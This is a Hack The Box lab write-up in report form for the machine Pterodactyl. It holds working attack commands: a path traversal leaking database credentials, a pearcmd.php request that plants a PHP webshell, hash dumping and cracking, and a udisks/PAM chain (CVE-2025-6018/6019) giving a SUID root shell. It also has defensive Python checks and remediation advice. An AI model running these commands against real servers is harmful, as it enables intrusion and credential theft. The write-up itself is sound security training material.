HTB - Pterodactyl
Path traversal in Pterodactyl Panel leaks database credentials. Pearcmd LFI converts to RCE, bcrypt hash cracking gives SSH access, then CVE-2025-6019 (udisks XFS resize without nosuid) escalates to root.
Hack The Box — Pterodactyl
Hard | openSUSE Leap 15.6 | Hack The Box
| Field | Value |
|---|---|
| Report Date | 12 February 2026 |
| Assessed By | RobInTheHood |
| Target IP | 10.129.2.124 |
| Hostname | panel.pterodactyl.htb |
| Domain | PTERODACTYL.HTB |
Table of Contents
- Executive Summary
- Scope
- Methodology
- Attack Chain Summary
- Findings
- Proof of Access
- Credentials Discovered
- Impact Assessment
- Remediation Summary
- Key Takeaways
- Tools Used
- Disclaimer
1. Executive Summary
This report documents the compromise workflow for the Hack The Box machine Pterodactyl. The objective was to obtain full system-level access in an authorised lab environment and document the attack path with reproducible evidence.
An unauthenticated path traversal in Pterodactyl Panel 1.11.10 (CVE-2025-49132) leaks config/database.php, including the MariaDB credentials and the Laravel APP_KEY. Because the host also exposes phpinfo.php, has PHP-PEAR installed and runs PHP with register_argc_argv = On, the same traversal includes pearcmd.php and turns the file read into code execution as wwwrun. The leaked database credentials give access to the panel's bcrypt user hashes; one cracks against rockyou and yields SSH access as phileasfogg3. Root follows from two local bugs in the openSUSE Leap 15.6 stack: CVE-2025-6018 (a user-controlled ~/.pam_environment makes polkit treat the SSH session as a physical seat) and CVE-2025-6019 (udisks resizes an attacker-supplied XFS image on a temporary mount without nosuid), so a SUID bash inside the image runs as root.
2. Scope
| Field | Value |
|---|---|
| Target IP | 10.129.2.124 |
| Hostname | panel.pterodactyl.htb |
| Domain | PTERODACTYL.HTB |
| Operating System | openSUSE Leap 15.6 |
| Machine Rating | Hard |
| Environment | Hack The Box — Authorised Training Lab |
| Assessment Date | 12 February 2026 |
| Assessor | RobInTheHood |
3. Methodology
- Reconnaissance — service discovery and external attack-surface mapping
- Enumeration — credential, configuration, and trust-path analysis
- Exploitation — initial access through validated vulnerability paths
- Lateral Movement — privilege pivoting and cross-context execution
- Privilege Escalation — full compromise to root/SYSTEM context
- Post-Exploitation — proof collection and impact-oriented validation
4. Attack Chain Summary
| Phase | Technique | MITRE ATT&CK |
|---|---|---|
| Recon | Nmap, vhost enumeration | T1046 · T1595.002 |
| Info Gathering | changelog.txt + phpinfo.php + CVE-2025-49132 path traversal → DB creds | T1083 · T1190 |
| Initial Access | pearcmd.php LFI-to-RCE (webshell as wwwrun) | T1190 · T1505.003 |
| Lateral Movement | MariaDB query → bcrypt hashes, john crack → SSH as phileasfogg3 | T1110.002 · T1021.004 |
| Privilege Escalation | CVE-2025-6018 (PAM fake seat) + CVE-2025-6019 (udisks XFS nosuid) → SUID bash → root | T1548.001 |
5. Findings
F-01 — Technical Walkthrough
Reconnaissance
| Port | Service |
|---|---|
| 22 | OpenSSH 9.6 |
| 80 | nginx 1.21.5 |
Virtual host enumeration reveals:
| Vhost | Description |
|---|---|
| pterodactyl.htb | MonitorLand — Minecraft community site |
| panel.pterodactyl.htb | Pterodactyl Panel v1.11.10 |
Information Gathering
changelog.txt on the main site notes that PHP-PEAR is installed and that phpinfo() has been left temporarily exposed. phpinfo.php confirms that disable_functions and open_basedir are both empty and that register_argc_argv = On, the three conditions that later make the PEAR include usable for code execution.
CVE-2025-49132 — Path Traversal Config Leak
The Panel’s /locales/locale.json endpoint passes the locale and namespace parameters into the translation loader’s include path without validation (Pterodactyl Panel 1.11.10; fixed in 1.11.11). A traversal in locale therefore includes any PHP file on disk; config files return arrays, which are serialised straight into the JSON response:
GET /locales/locale.json?locale=..%2f..%2fconfig&namespace=database&hash=1932da4d5c6
Extracted credentials:
- MariaDB: pterodactyl:PteraPanel on 127.0.0.1:3306
- APP_KEY: base64:UaThTPQnUjrrK61o+Luk7P9o4hM+gl4UiMJqcbTSThY= (AES-256-CBC)
- Session driver: Redis (DB 1); the session cookie is encrypted with APP_KEY
Initial Access — pearcmd.php LFI → RCE
PHP-PEAR’s pearcmd.php reads its command line from $_SERVER['argv'], which PHP fills from the query string (split on '+') when register_argc_argv is On. Including pearcmd.php through the same traversal therefore lets the query string drive a PEAR command: config-create writes a PEAR config file to a chosen path and embeds its first argument verbatim, so a PHP tag in that argument becomes a webshell:
# Step 1: write a webshell via PEAR config-create.
# --request-target sends the path verbatim, so the '+' separators and the PHP tag reach
# PHP unencoded; pearcmd sees argv = [config-create, /<?=...?>, /tmp/cmd2.php]
curl --request-target '/locales/locale.json?locale=../../../../../usr/share/php/PEAR&namespace=pearcmd&hash=1932da4d5c6&+config-create+/<?=system($_GET["c"])?>+/tmp/cmd2.php' 'http://panel.pterodactyl.htb/'
# Step 2: include the written file (/tmp/cmd2.php) through the same traversal; the command goes in c=
curl -sG 'http://panel.pterodactyl.htb/locales/locale.json' --data-urlencode 'locale=../../../../../tmp' --data-urlencode 'namespace=cmd2' --data-urlencode 'hash=1932da4d5c6' --data-urlencode 'c=id'
Result: uid=474(wwwrun) gid=477(www)
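What the two requests above actually do, modelled in Python as an added example (not code from the Pterodactyl Panel, Laravel, PHP or PEAR): the vulnerable include-path construction beside a hardened one, PHP's query-string-to-argv split under register_argc_argv, and pearcmd's command extraction. LANG_DIR is an assumed install path (the five ../ in the walkthrough's requests climb from it to /), and PEAR option handling is simplified to what the walkthrough needs.

```python
"""Model of the include path and PEAR argv behind the walkthrough's requests.

Added example; not code from the Pterodactyl Panel, Laravel, PHP or PEAR.
"""
import posixpath
import re
from urllib.parse import parse_qs

# Assumed install path (labelled assumption): five "../" from here reach "/".
LANG_DIR = "/var/www/pterodactyl/resources/lang"

# Query strings taken from the walkthrough above.
LEAK_QUERY = "locale=..%2f..%2fconfig&namespace=database&hash=1932da4d5c6"
PEARCMD_TARGET = (
    "/locales/locale.json?locale=../../../../../usr/share/php/PEAR"
    "&namespace=pearcmd&hash=1932da4d5c6"
    '&+config-create+/<?=system($_GET["c"])?>+/tmp/cmd2.php'
)

SAFE_SEGMENT = re.compile(r"^[A-Za-z0-9_-]+$")


def first_params(query: str) -> dict:
    """First value of each query parameter, %XX-decoded like PHP's $_GET."""
    return {k: v[0] for k, v in parse_qs(query).items()}


def resolved_include(locale: str, namespace: str) -> str:
    """Vulnerable pattern: a file translation loader reads
    <lang>/<locale>/<namespace>.php with both values used as raw path parts."""
    return posixpath.normpath(posixpath.join(LANG_DIR, locale, namespace + ".php"))


def hardened_include(locale: str, namespace: str) -> str:
    """Hardened pattern: accept bare identifiers only, then confirm the
    resolved path is still inside LANG_DIR (defence in depth)."""
    if not (SAFE_SEGMENT.match(locale) and SAFE_SEGMENT.match(namespace)):
        raise ValueError("locale/namespace must be a bare identifier")
    path = resolved_include(locale, namespace)
    if posixpath.commonpath([LANG_DIR, path]) != LANG_DIR:
        raise ValueError("resolved path escapes the lang directory")
    return path


def loader_rejects(locale: str, namespace: str) -> bool:
    """True when the hardened loader refuses the pair."""
    try:
        hardened_include(locale, namespace)
    except ValueError:
        return True
    return False


def php_argv_from_query(query: str) -> list:
    """With register_argc_argv=On, PHP's CGI/FPM SAPIs build $_SERVER['argv']
    by splitting QUERY_STRING on '+' (strtok semantics: empty tokens dropped,
    no %XX decoding). Everything before the first '+' becomes argv[0]."""
    return [tok for tok in query.split("+") if tok]


def pear_command(argv: list):
    """pearcmd.php drops argv[0] as the program name, skips leading '-' options
    and treats the first remaining token as the PEAR command. (Option values
    are not modelled; the walkthrough passes none.)"""
    args = argv[1:]
    while args and args[0].startswith("-"):
        args.pop(0)
    if not args:
        raise ValueError("no PEAR command present")
    return args[0], args[1:]


def trace_pearcmd_request(target: str):
    """(included file, PEAR command, its parameters) for a request target."""
    query = target.split("?", 1)[1]
    p = first_params(query)
    cmd, params = pear_command(php_argv_from_query(query))
    return resolved_include(p["locale"], p["namespace"]), cmd, params


if __name__ == "__main__":
    leak = first_params(LEAK_QUERY)
    print("leak includes:", resolved_include(leak["locale"], leak["namespace"]))
    included, cmd, params = trace_pearcmd_request(PEARCMD_TARGET)
    print("pearcmd request includes:", included)
    print("PEAR runs:", cmd, params)
    print("config-create writes", repr(params[0]), "into", params[1])
    print("hardened loader rejects the leak request:", loader_rejects(leak["locale"], leak["namespace"]))
```

The second curl request in the walkthrough is the same include path with locale ../../../../../tmp and namespace cmd2, which resolved_include() maps to /tmp/cmd2.php; the hash parameter never influences the path. The allowlist regex is the part that matters in the fix: once locale and namespace cannot contain a slash or a dot, neither the config leak nor the pearcmd include is reachable, and register_argc_argv becomes irrelevant to this endpoint.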
Lateral Movement — wwwrun → phileasfogg3
From the webshell, query the panel database with the leaked credentials:
# -pPteraPanel is the password leaked from config/database.php; 'panel' is the Panel's database
mariadb -u pterodactyl -pPteraPanel -h 127.0.0.1 panel -e "SELECT username,password FROM users;"
| Username | Hash |
|---|---|
| phileasfogg3 | $2y$10$PwO0TBZA8hLB6nuSsxRqoO... |
| headmonitor | $2y$10$3WJht3/5GOQmOXdljPbAJe... |
# john autodetects the $2y$ bcrypt format; cost 10 is slow, so expect a long run against rockyou
john --wordlist=/usr/share/wordlists/rockyou.txt hashes_bcrypt.txt
# phileasfogg3: !QAZ2wsx
ssh phileasfogg3@pterodactyl.htb
User flag: cat /home/phileasfogg3/user.txt
Privilege Escalation — CVE-2025-6019 (udisks XFS nosuid bypass)
sudo -l lists (ALL) ALL for the user, but with Defaults targetpw sudo asks for the target user's password (root's) rather than the caller's, so the entry is unusable without root's password.
CVE-2025-6018 — Faking a physical polkit session via PAM:
On this openSUSE build the PAM session stack runs pam_env, with ~/.pam_environment reading enabled, before pam_systemd, so variables from that user-owned file are already in the environment when pam_systemd registers the session with logind. Setting XDG_SEAT=seat0 and XDG_VTNR=1 makes logind record the SSH login as a local console session, polkit then classifies it as allow_active, and udisks actions that only require allow_active (loop-setup among them) succeed without authentication:
# pam_env syntax: VAR OVERRIDE=value; OVERRIDE replaces any value already present
echo 'XDG_SEAT OVERRIDE=seat0' > ~/.pam_environment
echo 'XDG_VTNR OVERRIDE=1' >> ~/.pam_environment
# Log out and back in over SSH so a fresh PAM session reads the file, then confirm
# logind now ties the session to seat0: loginctl show-session "$XDG_SESSION_ID" -p Seat -p Active
CVE-2025-6019 — XFS resize mounts without nosuid:
XFS can only be resized while mounted, so when udisks is asked to resize an XFS filesystem, libblockdev mounts it on a temporary directory under /tmp, and it does so without the nosuid flag. Any SUID-root binary inside the image is therefore executable with elevated privileges while that mount exists.
# On attacker: craft an XFS image carrying a SUID-root copy of bash
dd if=/dev/zero of=./xfs.image bs=1M count=300 && mkfs.xfs ./xfs.image
mkdir -p ./xfs.mount
sudo mount -t xfs ./xfs.image ./xfs.mount && sudo cp /bin/bash ./xfs.mount/ && sudo chmod 04555 ./xfs.mount/bash && sudo umount ./xfs.mount
scp ./xfs.image phileasfogg3@pterodactyl.htb:/tmp/xfs.image
# On target (from the SSH session with the faked seat0): attach the image as a loop device.
# loop-setup needs only allow_active, so no password is asked; note the loop device it prints
udisksctl loop-setup --file /tmp/xfs.image --no-user-interaction
# Keep the temporary mount busy: as soon as /tmp/blockdev*/bash appears, run it so the
# executing binary pins the mount and udisks cannot unmount after the resize
while true; do /tmp/blockdev*/bash -c 'sleep 10' && break; done &
# Ask udisks to resize the filesystem (size 0 = grow to fill the device);
# adjust loop0 if loop-setup mapped a different loop device
gdbus call --system --dest org.freedesktop.UDisks2 --object-path /org/freedesktop/UDisks2/block_devices/loop0 --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'
# The mount survives because its target is busy; -p keeps the SUID euid of 0
/tmp/blockdev*/bash -p
Root flag: cat /root/root.txt
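Defender-side checks for the two conditions this escalation relies on, as an added Python example (not code from the page, SUSE, Linux-PAM or udisks): the PAM session-stack ordering behind CVE-2025-6018, the ~/.pam_environment contents an attacker leaves behind, and the nosuid-less temporary mount under /tmp that CVE-2025-6019 creates. The PAM stacks, the .pam_environment file and the findmnt output are constructed samples, not captures from the target.

```python
"""Audit helpers for the PAM-ordering and udisks temporary-mount conditions.

Added example; not code from the page, SUSE, Linux-PAM or udisks.
"""

# ---- constructed samples (not captured from the target) --------------------
PAM_SESSION_VULNERABLE = """\
# constructed SUSE-style session stack: pam_env runs before pam_systemd
session optional pam_keyinit.so revoke
session required pam_limits.so
session required pam_unix.so try_first_pass
session optional pam_env.so user_readenv=1
session optional pam_systemd.so
"""

PAM_SESSION_FIXED = """\
session optional pam_keyinit.so revoke
session required pam_limits.so
session required pam_unix.so try_first_pass
session optional pam_systemd.so
session optional pam_env.so
"""

PAM_ENVIRONMENT_MALICIOUS = """\
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
"""

# constructed 'findmnt -rn -o TARGET,SOURCE,FSTYPE,OPTIONS' output; the
# /tmp/blockdev.* name is the shape udisks uses for its resize mount
FINDMNT_SAMPLE = """\
/ /dev/vda2 xfs rw,relatime,attr2,inode64
/tmp tmpfs tmpfs rw,nosuid,nodev,relatime
/tmp/blockdev.XVoKRe /dev/loop0 xfs rw,relatime,attr2,inode64
/mnt/data /dev/vdb1 ext4 rw,nosuid,nodev,relatime
"""


def _session_modules(pam_text: str) -> list:
    """(module, options) for each session line in stack order. Bracketed
    control fields such as [success=1 default=ignore] are skipped by locating
    the first token ending in .so; a full module path is reduced to its name."""
    mods = []
    for raw in pam_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if parts[0] not in ("session", "-session"):
            continue
        so = next((i for i, p in enumerate(parts) if p.endswith(".so")), None)
        if so is None:
            continue
        mods.append((parts[so].rsplit("/", 1)[-1], parts[so + 1:]))
    return mods


def pam_env_before_systemd(pam_text: str) -> str:
    """'vulnerable' when pam_env.so with user_readenv=1 precedes pam_systemd.so,
    'review' when it precedes without the option (older Linux-PAM releases
    defaulted user_readenv on), 'ok' when pam_env runs after pam_systemd or
    either module is absent."""
    mods = _session_modules(pam_text)
    names = [m for m, _ in mods]
    if "pam_env.so" not in names or "pam_systemd.so" not in names:
        return "ok"
    env_i, sysd_i = names.index("pam_env.so"), names.index("pam_systemd.so")
    if env_i > sysd_i:
        return "ok"
    return "vulnerable" if "user_readenv=1" in mods[env_i][1] else "review"


def seat_overrides(pam_environment_text: str) -> dict:
    """XDG seat variables a ~/.pam_environment tries to set, in either the
    'VAR OVERRIDE=value' or the 'VAR=value' form pam_env accepts."""
    found = {}
    for raw in pam_environment_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        name = line.split()[0].split("=", 1)[0]
        if name in ("XDG_SEAT", "XDG_VTNR"):
            found[name] = line[len(name):].lstrip(" =")
    return found


def suid_capable_tmp_mounts(findmnt_text: str) -> list:
    """(target, source) for mounts under /tmp whose options lack nosuid, from
    findmnt -rn output with columns TARGET,SOURCE,FSTYPE,OPTIONS. A udisks
    resize mount (/tmp/blockdev.*) listed here is the CVE-2025-6019 window."""
    hits = []
    for line in findmnt_text.splitlines():
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        target, source, _fstype, options = parts
        if target.startswith("/tmp/") and "nosuid" not in options.split(","):
            hits.append((target, source))
    return hits


if __name__ == "__main__":
    print("vulnerable stack:", pam_env_before_systemd(PAM_SESSION_VULNERABLE))
    print("fixed stack:     ", pam_env_before_systemd(PAM_SESSION_FIXED))
    print("seat overrides:  ", seat_overrides(PAM_ENVIRONMENT_MALICIOUS))
    print("suid-capable /tmp mounts:", suid_capable_tmp_mounts(FINDMNT_SAMPLE))
```

On a live host, feed pam_env_before_systemd() the session stack from /etc/pam.d (common-session on SUSE), seat_overrides() each user's ~/.pam_environment, and suid_capable_tmp_mounts() the output of findmnt -rn -o TARGET,SOURCE,FSTYPE,OPTIONS. The mount check only catches the resize window while it is open, so it belongs in a periodic job or alongside an audit watch on /tmp/blockdev*; the PAM and .pam_environment checks are static and can run once.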
6. Proof of Access
| Level | Evidence |
|---|---|
| User | cat /home/phileasfogg3/user.txt |
| Root | cat /root/root.txt |
7. Credentials Discovered
| Account | Secret | Type | Source |
|---|---|---|---|
| pterodactyl | PteraPanel | MariaDB password (127.0.0.1:3306, database panel) | config/database.php via CVE-2025-49132 |
| (Laravel APP_KEY) | base64:UaThTPQnUjrrK61o+Luk7P9o4hM+gl4UiMJqcbTSThY= | AES-256-CBC application key; encrypts the session cookie | Panel config via CVE-2025-49132 |
| phileasfogg3 | !QAZ2wsx | bcrypt hash cracked with john; valid for SSH | users table of the panel database |
| headmonitor | $2y$10$3WJht3/5GOQmOXdljPbAJe... | bcrypt hash; no plaintext recorded in this report | users table of the panel database |
8. Impact Assessment
An unauthenticated attacker who can reach panel.pterodactyl.htb obtains the database credentials and APP_KEY without any account, then code execution as wwwrun, every panel user's password hash, an SSH login, and finally root on the host. Root on the Panel host means control of every game server the Panel manages and of the Wings trust it holds, so the impact is full compromise of the hosting platform, not just of one web application.
9. Remediation Summary
| Priority | Action |
|---|---|
| High | Upgrade Pterodactyl Panel beyond 1.11.10 to a release that fixes CVE-2025-49132 (1.11.11 or later); remove phpinfo.php and the changelog.txt disclosure from the web root. |
| High | Remove PHP-PEAR (pearcmd.php) from the production host or set register_argc_argv = Off; populate disable_functions and open_basedir for the Panel's PHP-FPM pool. |
| High | Patch udisks2/libblockdev for CVE-2025-6019 and the PAM configuration for CVE-2025-6018 so pam_env no longer reads ~/.pam_environment before pam_systemd registers the session. |
| Medium | Rotate the MariaDB password and the APP_KEY, keep the database account at least privilege, and enforce a password policy so panel accounts do not crack against rockyou. |
| Medium | Add detections: locale parameters containing ../ on /locales/locale.json, PHP files written under /tmp by wwwrun, new ~/.pam_environment files setting XDG_SEAT or XDG_VTNR, and udisks loop-setup or Filesystem.Resize calls originating from SSH sessions. |
10. Key Takeaways
- One path traversal (CVE-2025-49132) became code execution only because three small settings lined up: PHP-PEAR installed, register_argc_argv = On, and a phpinfo.php page advertising both.
- Leaked database credentials and a password found in rockyou carried the foothold from wwwrun to an SSH account; credential exposure and weak passwords are the escalation multipliers here.
- Root needed no kernel bug: PAM module ordering (CVE-2025-6018) plus a mount-option omission in udisks (CVE-2025-6019) were enough.
- Reproducible testing and evidence-driven reporting improve remediation quality.
11. Tools Used
| Tool | Purpose |
|---|---|
| nmap | Port and service discovery (22/tcp OpenSSH 9.6, 80/tcp nginx 1.21.5) |
| gobuster | Virtual host enumeration (pterodactyl.htb, panel.pterodactyl.htb) |
| curl | Path-traversal config leak and pearcmd.php webshell requests |
| mariadb | Dumping bcrypt hashes from the panel database with the leaked credentials |
| john | Cracking the bcrypt hashes against rockyou |
| mkfs.xfs / mount | Building the XFS image with a SUID-root bash on the attacker host |
| udisksctl / gdbus | loop-setup and Filesystem.Resize calls against udisks (CVE-2025-6019) |
12. Disclaimer
This assessment was performed exclusively in an authorised Hack The Box training environment for educational and portfolio purposes.
End of Report — Pterodactyl | RobInTheHood | 12 February 2026